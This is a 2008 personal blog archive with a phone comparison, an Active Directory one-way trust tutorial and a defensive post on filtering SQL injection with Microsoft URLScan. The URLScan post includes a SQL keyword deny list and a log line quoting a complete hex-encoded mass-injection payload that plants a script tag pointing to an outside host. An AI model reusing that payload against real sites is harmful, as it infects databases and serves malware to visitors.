2008 August | Brad Marsh's Weblog

Aug 31 2008

HTC Touch Diamond Vs Apple I-Phone 3G

I was able to play with the only released and for me long awaited HTC Diamond the other day, I was extremely excited about this phone, seeing many videos and reviews. And while we all know the IPhone was released not to long ago either as the also long awaited 3G platform, and while I praise what apple has done with the Iphone, they have opened a whole new world of functionality and features, but in doing this I seem to read nothing but flaws with the IPhone, apple were clearly under pressure to get the 3g phone out in the wild by setting official dates, however this has come at a BIG cost to apple.

here is the latest of apples issues with the IPHONE

Anyway back to the HTC vs the IPHONE.

After playing with the HTC, I walked away less then impressed, why well mostly I am sure because of the hype stirred around the phone, but also because I found the touch functionality still not to be on par with the IPhones ease of touch and movement.

I found zooming into pictures needed a full 360 of your finger rather then say a 180 twirl, the flick of the finger across the side bar of the HTC seem to be random in terms of what it would select there was no nice graphical movement like the IPhone.

On the upside the on screen keyboard is surprisingly easy to use and resisters the touch much, much better then previous models, of course the on screen display is made bigger, but even with my fat fingers it seems very easy to use, for those with even fatter fingers then me well you can use the condensed qwerty keyboard, or other alternatives.

another upside is its cool looking display and layout is easy to use, the menus have been made larger or finger friendly rather then using the stylist all the time.

And in terms of the form factor well they are both on par with each other.

All in all my thoughts are the Iphone ease is still a winner HTC do have some work to do to match the Iphone, but then the HTC is working of the mature and proven windows mobile, which lets face it the amount of things that you can do with windows mobile is phenomenal.

If I had to choose I would still go the HTC, but for me I am going play the waiting game a little more for the HTC touch Pro, this to me is more of a power / Business users phone.

Twitter This

5 comments | posted in Windows Mobile, gadgets

Aug 13 2008

Bye Bye SQL Injections

With SQL Injections becoming more prevalent in the last few years we need to find better ways of deafening ourselves against these attacks, it seems that only the other week there was a new injection that has infected thousands of SQL servers [READ MORE HERE]

So here is a method that we can say bye bye to SQL Injection.

Well not completely, but maybe a large percentage of them how you ask… well simple code better… no no really I don’t claim to be a Developer / coder by any means and I would hate to think how hard it would be to cover every hole in a web application that was reasonably sized, in fact it might be near impossible?

Anyway back to the topic, I was alerted to an application that is called ‘URLScan’ (specifically 3.0 beta) it is a free Microsoft application, that acts as an ISAPI filter for II5.1, IIS6 and IIS7, after reading a bit about it my eyes were starting open wider and wider, the things that you can do with this tiny filter are simply amazing. It is nothing but a simple filter process where you can allow or deny access to file extensions, limit accepted URL length, Allow / deny Verbs, allow / deny access to URLstrings, the list goes on, now yes we can do some of these things in IIS, especially in IIS7 as it has brought a few of these functions to the table by default, but the ease of configuration and the expandability of this just blows using IIS additional security functions out of the water.

here is a screenshot of the default .ini file as you can see some of the many nifty features in the standard ini file. Some you will see that you can already control them in IIS.

So why would you use this over IIS for example in terms of the obvious what pages are accepted and pages are declined, well simple the logging is much easier read to the human eye, you can easily skim past it and find what you need quickly, IIS if you are logging everything (which if you run stats that collect IIS log files you will have this on) then the log files become quickly hard to read at first glance

here is a snippet of the log file output:

[08-13-2008 - 01:13:06] ----- UrlScan v3.0 Beta Config Initialization ----
[08-13-2008 - 01:13:06] The following verbs will be allowed: GET, HEAD, POST
[08-13-2008 - 01:13:06] The following extensions will not be allowed: .exe, .bat, .cmd, .com, .htw, .ida, .idq, .htr, .idc, .shtm, .shtml, .stm, .printer, .ini, .log, .pol, .dat, .config
[08-13-2008 - 01:13:06] The following URL sequences will be denied: .., ./, \, :, %%, &
[08-13-2008 - 01:13:06] The following Query String sequences will be denied: %%3C, %%3E, sql injection], appliesto=.asp,.aspx, denydatasection=sql injection strings, scanurl=0, scanallraw=0, scanquerystring=1, scanheaders=
[08-13-2008 - 01:13:06] The following rules are active: 
[08-13-2008 - 01:30:37] Client at 66.249.67.77: URL contains sequence '\', which is disallowed. Request will be rejected.  Site Instance='701014', Raw URL='/images%%5Cbtn_add.gif'

As you can see it shows URL scan is starting with what is being denied or allowed, the last line shows an entry where an IP address was denied access to a sequence.

I mentioned expandability previously, there is just so much you could do with this as an example here is some expandability you could tack into the ScanURL to stop SQL injections, its as simple as copy and paste into your INI file that’s it….

 
[SQL Injection]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=1
ScanHeaders=
 
[SQL Injection Strings]
--
;%3b ; a semicolon
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
create
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
insert
kill
open
select
sys ; also catches sysobjects and syscolumns
table
update
 
[SQL Injection Headers]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=0
ScanHeaders=Cookie:
 
[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
cast
convert
create
declare
delete
drop
exec ; also catches execute
fetch
insert
kill
select

Obviously there are problems with this because chances are that your web app uses some of these within a query string to retrieve the data from the database, but its a great starting point I would suggest running it all on a dev server test, watch the log file and see what is being queried, if you know it is needed then simply comment out the item that was denied, this will then allow it, its a simple process of elimination.

The other thing I have found with a considerably amount of SQL injections are they are very long strings, I found a number of Injections and then found the word count on them all, it averaged around 1050 characters, so if you web app doesn’t have extremely long query strings why not reduce the number of allowed characters???
say for example:

MaxQueryString=800

if you do this I do suggest monitoring this to ensure your web app is not in fact generating massive strings.

Since applying URLScan I have tried sending through Injections attacks (harmless ones) and so far they have failed and been caught by URLScan here is a an attempt from a log file from a test injection:

08-13-2008 – 00:54:46] Client at 190.77.130.45: Query string length exceeded maximum allowed. Request will be rejected. Site Instance=’2041367400′, QueryString= ‘ArticleID=335&PrintFriendly=True;DECLARE%%20@S%%20VARCHAR(4000);SET%%20@S=CAST(0×4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E393868732E72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%%20AS%%20VARCHAR(4000));EXEC(@S);–’, Raw URL=’/Default.aspx’

Download URLScan 3.0 Beta (for x86 machines) here
Download URLScan 3.0 Beta (for x64 Machines) here

Twitter This

3 comments | posted in Microsoft, SQL Server, Software

Aug 6 2008

Windows Mobile: What lies ahead

Found a fantastic post on windows mobile and the future of windows mobile what is required and where its headed.

For those windows mobile fans defiantly worth a read.

http://gizmodo.com/gadgets/what.s-wrong-with-windows-mobile/whats-wrong-with-windows-mobile-and-how-wm7-and-wm8-are-going-to-fix-it-333536.php

Twitter This

6 comments | posted in Microsoft, Windows Mobile

Aug 4 2008

Active Directory – Creating One Way Domain Trusts

Thought I might do a quick blog about creating a one way trust, as I found there to be little text on this following scenario, where the primary domain has access to the other domain, but the secondary domain has only access to itself.

Ok so if you have the same requirement, first thing is don’t bother creating a child domain within the same forest of the current domain, you can’t seem to create a one way, buy default Microsoft will create a 2 way trust. So that means you must create a domain in a separate forest, whilst there is a bit more involved in setting up the forest in terms of allowing domain admin’s rights to manage the other domain etc, it will be well worth it in the long run from a security perspective.

Anyways, do your DC promo and create a new forest, and follow the prompts there is stacks of text on this so I am not going to ramble on about this one.

Once the new domain is created, open ‘Active Directory Domains and Trusts’ on the primary domain find the domain right click, properties. go to the ‘trusts’ tab.

(before you do this setup you most likely will have DNS issues, I would spend a bit of time sorting that out first other wise the next steps will not work)

Now you should have nothing there are present.

here you will have enter the other forests domain, choose trust with a windows domain, then next.

Make sure you choose a one way: incoming

THIS is really important, if you don’t choose ‘This domain only’ it will NOT create a one way trust in the way that we want.

enter a password for the trust

Here say no, because at this point you only have the one trust so you have nothing to confirm the trust with at this point.

No go back and do the same with other domain however the only difference is your looking for the primary domain as a trust and you will need to specify a outgoing trust:

“Outgoing: Users in the specified domain can authenticate in the local domain, but users in the local domain cannot authenticate in the specified domain.”

Once you have done this then go to the properties and then you will see a validate, click on this put your administrator credentials for each domain, on completion it should give you the below message: